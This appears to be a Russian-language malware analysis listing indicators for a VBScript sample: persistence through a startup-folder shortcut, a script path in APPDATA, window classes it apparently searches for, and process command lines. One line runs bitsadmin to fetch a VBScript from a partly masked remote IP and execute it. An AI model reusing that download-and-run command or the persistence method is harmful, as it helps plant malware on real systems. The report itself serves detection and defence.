Техническая информация
Автозапуск — ярлык в папке автозагрузки пользователя:
- %HOMEPATH%\Start Menu\Programs\Startup\WshShell.vbs.lnk
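Командные строки запускаемых процессов:
- '<SYSTEM32>\wscript.exe' "%APPDATA%\WshShell\WshShell.vbs"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download /priority high "http://13#.#43.40.199/m/WEscr.vbs" "%cd%\Shell.vbs" && start Shell.vbs
  (bitsadmin загружает WEscr.vbs с удалённого узла в текущий каталог под именем Shell.vbs; при успешной загрузке сценарий запускается. IP-адрес в источнике частично скрыт символами «#».)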
Файл сценария в профиле пользователя (этот же путь передаётся wscript.exe):
- %APPDATA%\WshShell\WshShell.vbs
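Классы окон (предположительно, окна, которые ищет образец; Shell_TrayWnd — класс окна панели задач Windows):
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''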